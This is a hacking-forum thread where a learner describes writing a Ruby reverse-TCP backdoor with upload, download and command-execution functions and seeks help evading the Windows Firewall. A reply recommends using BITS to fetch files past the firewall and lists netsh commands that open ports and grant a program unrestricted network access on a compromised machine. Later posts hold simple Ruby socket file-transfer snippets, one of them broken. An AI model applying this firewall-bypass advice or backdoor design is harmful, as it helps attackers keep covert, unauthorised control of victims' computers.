Results 1 to 10 of 10

Thread: Learning ruby... My first ruby backdoor...

Hybrid View

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default Learning ruby... My first ruby backdoor...

    Im a few days into learning ruby... i have started a basic reverse tcp backdoor... there will only be a few functions like upload, download and exec...

    the server writes a string then the client recieves it and process it with some if expressions to deturmen what functions to execute...

    right now im stuck with upload and downloading files on the client... this would be so easy with the use of 'net/ftp' but any time the client trys to ftp.get(file) then the windows firewall pops up asking for permission...

    i have found a 'smb' function but it looks unstable and i have not tested this with the windows firewall... I would like to send files threw ruby with tcp functions but i have found nothing helpfull other then ftp and sftp.... i have not tested sftp yet but im sure it will have the same results...

    I could have ruby utilize netcat but this would be sketchy and still not sure how the fire wall will react...

    this is so far a lot of fun and everything is going together like planned but this firewall problem...

  2. #2
    Junior Member
    Join Date
    Apr 2009
    Posts
    43

    Default

    The most simple Windows Firewall Bypass I know of is BITS
    http://en.wikipedia.org/wiki/Backgro...ansfer_Service

    I'm not sure how you could interface with it in Ruby, but if you can execute shell commands then you can just use the BITS admin application.
    This will provide you with downloading files from elsewhere without firewall


    On the other hand if your ruby backdoor has admin privs you could easily add exceptions to the Windows Firewall, through shell commands


    Something along the lines of this (I will give a few examples)

    Single ports
    netsh firewall add portopening TCP 23 Telnet
    netsh firewall add portopening UDP 1337 Dunno
    netsh firewall add portopening ALL 5900 VNC

    Allow a program unrestricted access to the internet
    netsh firewall add allowedprogram C:\myapp.exe MyApp ENABLE

  3. #3
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    That is help full... the payloads in metasploit are coded in ruby correct? I have spent time looking threw the source of some payloads but its hard for me to read code that is so advanced... i need to find some basic examples...

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Ok... i have been looking around and found some example code for sending a file from the client to the server over a socket... Im having trouble trying use this example to get the client to download a file from the server...

    here is a example of how the client uploads a file to the server...
    Code:
    #server.rb
    	  sock = TCPServer.open(2000)
    	  con = sock.accept
    	  msg = con.read
    	  destFile = File.new('test.txt', 'w')
    	  destFile.print msg
    	  destFile.close
    Code:
    #client.rb
    	fileContent = File.read('c:\\folder\\test.txt')   # source file to send to the server
    	sock = TCPSocket.open('localhost', 2000)
    	sock.print fileContent
    	sock.close
    So thats a working example of how the client can send a file to the server over a socket... i have been at this all day trying to get the client to download a file from the server by looking at this example...

    Is there any one that can help me?

  5. #5
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Well, by just looking at some lines of code it is hard to get anything working

    Just kidding.

    Where is your problem exactly? Like you can't get it implemented or you don't understand the code?
    Tiocfaidh ár lá

  6. #6
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Quote Originally Posted by KMDave View Post
    Well, by just looking at some lines of code it is hard to get anything working

    Just kidding.

    Where is your problem exactly? Like you can't get it implemented or you don't understand the code?
    I understand the code... its like write data to a socket then on the other side this data is read then wrote to a file...

    the process is in my head but i cant implement this... also, the code i posted will only work with text files... images and executebles dont function after being sent threw the socket...


    Edit... here is my attempt to have the client download a file from the server...
    Code:
    #server.rb
    require 'socket'
    
    
         fileContent = File.read('text.txt')
    	 sock = TCPServer.open(2000)
    	 con = sock.accept
    	 sock.print fileContent
    	 sock.close
    Code:
    require 'socket'
    #client.rb
          sock = TCPSocket.open('localhost', 2000)
    	  destFile = File.new('c:\\hacked\\text.txt', 'w')
    	  destFile.print
    	  destFile.close
    It does not work... i have been moving things around trying to get this to work but im stuck...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •